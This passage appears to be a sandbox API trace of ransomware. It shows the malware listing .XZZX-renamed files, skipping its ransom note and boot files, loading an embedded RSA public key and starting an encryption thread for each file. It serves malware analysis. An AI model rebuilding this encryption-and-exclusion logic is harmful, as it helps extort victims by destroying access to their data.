lpSrch="ntldr") returned 0x0 [0107.559] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTLDR") returned 0x0 [0107.559] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.559] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0107.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0107.559] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0107.559] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.559] lstrcpyW (in: lpString1=0x17addc, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0107.559] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d8 [0107.559] Sleep (dwMilliseconds=0x96) [0107.708] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.708] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2="..") returned 1 [0107.708] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2=".") returned 1 [0107.708] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.708] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntldr") returned 0x0 [0107.708] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTLDR") returned 0x0 [0107.708] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.708] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.708] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0107.708] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0107.708] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0107.708] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.708] lstrcpyW (in: lpString1=0x17addc, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0107.708] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.708] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3dc [0107.708] Sleep (dwMilliseconds=0x96) [0107.864] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0107.864] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2="..") returned 1 [0107.864] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2=".") returned 1 [0107.864] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0107.864] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntldr") returned 0x0 [0107.864] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTLDR") returned 0x0 [0107.864] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0107.864] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0107.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0107.864] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0107.864] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0107.864] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0107.864] lstrcpyW (in: lpString1=0x17addc, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0107.864] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0107.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0107.864] Sleep (dwMilliseconds=0x96) [0108.020] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.020] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2="..") returned 1 [0108.020] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2=".") returned 1 [0108.020] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.020] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntldr") returned 0x0 [0108.020] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTLDR") returned 0x0 [0108.020] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.020] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.020] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.020] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.020] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.020] lstrcpyW (in: lpString1=0x17addc, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0108.020] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e4 [0108.020] Sleep (dwMilliseconds=0x96) [0108.176] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.176] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2="..") returned 1 [0108.176] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2=".") returned 1 [0108.176] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.176] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntldr") returned 0x0 [0108.176] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTLDR") returned 0x0 [0108.176] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.176] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.176] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.176] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.176] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.176] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.176] lstrcpyW (in: lpString1=0x17addc, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0108.176] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0108.177] Sleep (dwMilliseconds=0x96) [0108.332] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.332] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2="..") returned 1 [0108.332] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2=".") returned 1 [0108.332] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.332] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntldr") returned 0x0 [0108.332] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTLDR") returned 0x0 [0108.332] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.332] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.332] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.332] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.332] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.332] lstrcpyW (in: lpString1=0x17addc, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0108.332] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3ec [0108.333] Sleep (dwMilliseconds=0x96) [0108.488] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0108.488] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2="..") returned 1 [0108.488] lstrcmpW (lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpString2=".") returned 1 [0108.488] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0108.488] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntldr") returned 0x0 [0108.488] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTLDR") returned 0x0 [0108.488] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0108.488] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0108.488] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0108.488] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0108.488] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0108.488] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0108.488] lstrcpyW (in: lpString1=0x17addc, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0108.488] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0108.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0108.489] Sleep (dwMilliseconds=0x96) [0108.644] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 